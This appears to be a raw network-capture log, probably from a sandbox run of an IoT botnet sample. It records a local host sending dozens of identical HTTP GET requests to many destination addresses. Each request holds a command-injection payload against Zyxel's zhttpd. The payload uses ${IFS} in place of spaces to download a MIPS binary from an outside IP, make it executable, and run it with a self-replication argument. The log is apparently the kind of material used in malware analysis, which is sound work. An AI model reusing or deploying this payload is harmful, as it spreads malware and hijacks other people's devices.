                                                        Feb 2, 2024 06:21:18.094222069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6464192.168.2.1434162192.28.189.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094243050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6465192.168.2.1449506168.165.143.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094297886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6466192.168.2.1449548195.212.205.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094321012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6467192.168.2.1455270181.175.15.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094357967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6468192.168.2.145127040.59.219.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094382048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6469192.168.2.1456438199.77.63.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094441891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6470192.168.2.1452068164.154.75.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094482899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6471192.168.2.1451746183.236.36.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094530106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6472192.168.2.144531241.119.231.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094564915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6473192.168.2.1458554161.249.45.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094599009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6474192.168.2.145325242.208.160.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094641924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6475192.168.2.1437836153.240.243.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094690084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6476192.168.2.144175462.123.67.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094710112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6477192.168.2.1434156140.33.20.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094753981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6478192.168.2.144968046.93.102.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094786882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6479192.168.2.1435104105.242.1.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094821930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6480192.168.2.1435380220.62.81.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094861984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6481192.168.2.145375095.255.174.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094932079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6482192.168.2.1458548205.141.142.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094955921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6483192.168.2.144441895.145.202.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.094999075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6484192.168.2.1445926186.253.71.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095035076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6485192.168.2.1441398119.169.220.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095077991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6486192.168.2.143409087.11.12.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095110893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6487192.168.2.1436746106.171.21.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095132113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6488192.168.2.145489637.155.61.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095195055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6489192.168.2.1450616154.217.194.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095237017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6490192.168.2.144547097.190.64.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095262051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6491192.168.2.1447612144.240.103.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095295906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6492192.168.2.1438720216.247.11.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095335960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6493192.168.2.145561624.132.97.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095376968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6494192.168.2.1451250179.121.54.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095410109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6495192.168.2.1451234189.24.18.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095453024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6496192.168.2.1458144176.27.37.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095478058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6497192.168.2.1452860163.12.232.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095509052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6498192.168.2.1447014169.76.241.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095571041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6499192.168.2.1438874222.52.113.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095604897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6500192.168.2.1455156141.51.198.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095638990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6501192.168.2.1436354147.112.11.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095688105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6502192.168.2.143343061.155.42.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095717907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6503192.168.2.1448134110.70.125.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095794916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6504192.168.2.1442786154.188.196.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095829964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6505192.168.2.145176259.107.236.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095866919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6506192.168.2.1446264181.249.180.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095916986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6507192.168.2.143690861.131.10.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.095956087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6508192.168.2.1432914159.182.36.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096015930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6509192.168.2.145217064.183.182.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096033096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6510192.168.2.1459418160.7.209.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096065998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6511192.168.2.143292282.183.156.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096117020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6512192.168.2.145145413.41.72.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096168041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6513192.168.2.143436827.86.118.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096204042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6514192.168.2.144040060.80.214.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096227884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6515192.168.2.1443438161.252.50.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096296072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6516192.168.2.143475623.66.132.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096338987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6517192.168.2.1445970173.122.191.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096362114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6518192.168.2.1439830180.110.101.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096404076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6519192.168.2.144916070.146.49.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096434116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6520192.168.2.1452636114.188.248.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096457005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6521192.168.2.1442586186.160.26.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096482992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6522192.168.2.143711688.232.105.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096510887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6523192.168.2.143602471.98.248.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096529961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6524192.168.2.1452214148.143.100.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096592903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6525192.168.2.1434382130.86.68.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096621990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6526192.168.2.1434844133.186.97.78443
                                                        TimestampBytes transferredDirectionData
